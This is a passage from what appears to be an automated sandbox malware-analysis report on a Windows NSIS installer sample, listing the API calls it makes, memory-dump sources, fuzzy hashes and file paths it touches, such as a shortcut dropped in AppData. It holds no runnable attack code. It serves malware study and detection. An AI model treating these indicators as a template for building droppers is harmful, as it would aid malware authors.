            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Text$ItemTimerWindowwsprintf
            • String ID: unpacking data: %d%%$verifying installer: %d%%
            • API String ID: 1451636040-1158693248
            • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
            • Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
            • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
            • Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59
            APIs
            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
            • GlobalFree.KERNEL32(?), ref: 004028E9
            • GlobalFree.KERNEL32(00000000), ref: 004028FC
            • CloseHandle.KERNEL32(?), ref: 00402914
            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Global$AllocFree$CloseDeleteFileHandle
            • String ID:
            • API String ID: 2667972263-0
            • Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
            • Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
            • Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
            • Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98
            APIs
            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
            • wsprintfW.USER32 ref: 00404B43
            • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s$(7B
            • API String ID: 3540041739-1320723960
            • Opcode ID: afafdca3c6210d5d4d8b94ffdd74de7fbfcb70a5bfc742bd25c1e20ce12fb75b
            • Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
            • Opcode Fuzzy Hash: afafdca3c6210d5d4d8b94ffdd74de7fbfcb70a5bfc742bd25c1e20ce12fb75b
            • Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC
            APIs
            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,000000FF,C:\Users\user\AppData\Roaming\coabode\votiveness.lnk,00000400,?,?,00000021), ref: 00402583
            • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\coabode\votiveness.lnk,?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,000000FF,C:\Users\user\AppData\Roaming\coabode\votiveness.lnk,00000400,?,?,00000021), ref: 0040258E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: ByteCharMultiWidelstrlen
            • String ID: C:\Users\user\AppData\Roaming\coabode\votiveness.lnk$C:\Users\user\Pictures\forflytningers\strudsg.Dis
            • API String ID: 3109718747-3525824467
            • Opcode ID: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
            • Instruction ID: 4789cac02ba757069cd1743e95fa376523a080456913a55bd7acca95e4ec0b97
            • Opcode Fuzzy Hash: 0c35066402b3918afc1c871e7d2c22be95a3eb8eb18936aedf2232c1315ab8f0
            • Instruction Fuzzy Hash: CA11E772A01204BADB10AFB18F4EE9E32659F54355F20403BF502F65C1DAFC8E51576E
            APIs
            • GetDlgItem.USER32(?,?), ref: 00401D00
            • GetClientRect.USER32(00000000,?), ref: 00401D0D
            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
            • DeleteObject.GDI32(00000000), ref: 00401D4B
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
            • Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
            • Opcode Fuzzy Hash: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
            • Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38
            APIs
            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
            • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
            • Opcode Fuzzy Hash: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
            • Instruction Fuzzy Hash: F2219071940209BEEF01AFB5CE4AABE7B75EF44744F10403EFA01B61D1D6B88A409B69
            APIs
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00406075
            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00406096
            • RegCloseKey.ADVAPI32(?,?,004062BE,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060B9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: : Completed
            • API String ID: 3677997916-2954849223
            • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
            • Instruction ID: 0186f18981595c0b19feb364ea02d5f95392918b8fa258a18f8687652683a575
            • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
            • Instruction Fuzzy Hash: 4501483115020AEADF21CF66ED08E9B3BA8EF84390B01402AF845D2220D735D964DBA5
            APIs
            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B38
            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405B42
            • lstrcatW.KERNEL32(?,0040A014), ref: 00405B54
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B32
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-823278215
            • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
            • Instruction ID: 1c34604f245f66d13fb295c2dca74b2082213948d97efa3850964b8affffb698
            • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
            • Instruction Fuzzy Hash: 57D05E31101934AAC2116B448C04DDB73AC9E46304341442AF201B70A6C778695286FD
            APIs
            • SetWindowTextW.USER32(00000000,00429240), ref: 00403D35
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: TextWindow
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$1033
            • API String ID: 530164218-2876219968
            • Opcode ID: 9d022d01f112da27556ef407cc074c94f0222ef42f22569fe4f3b5c0e17e7ae8
            • Instruction ID: 4786a0dcc4ba2f930af81554b1ec9cb86176e7a1d2ad565e9f211a7c6dcc4e6b
            • Opcode Fuzzy Hash: 9d022d01f112da27556ef407cc074c94f0222ef42f22569fe4f3b5c0e17e7ae8
            • Instruction Fuzzy Hash: 7111C331B44210ABD7359F15EC40A337B6CEF85715B28427BE801AB3A1C63A9D1296A9
            APIs
              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
              • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0,00000000), ref: 00405BEB
              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
              • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0,00000000), ref: 00405C93
            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0), ref: 00405CA3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CharNext$AttributesFilelstrcpynlstrlen
            • String ID: 0_B
            • API String ID: 3248276644-2128305573
            • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
            • Instruction ID: 790be11e20efdccda9c73cacd4945748764c6204d4d0b11914a12a4c94a1ccfd
            • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
            • Instruction Fuzzy Hash: 41F0F925108F6515F62233790D05EAF2554CF82394755067FF891B12D1DB3C9D938C7D
            APIs
            • IsWindowVisible.USER32(?), ref: 00405280
            • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
            • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
            • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
            • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
            APIs
            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405B84
            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00405B94
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-1246513382
            • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
            • Instruction ID: 87bbc210c64b19a6b78a00595756172ded5dec919d443e3f73ce50da7c0279be
            • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
            • Instruction Fuzzy Hash: D4D05EB24009209AD312AB04DD00DAF77ACEF163007464426E841AB166D778BC8186BC
            APIs
            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
            • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
            • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
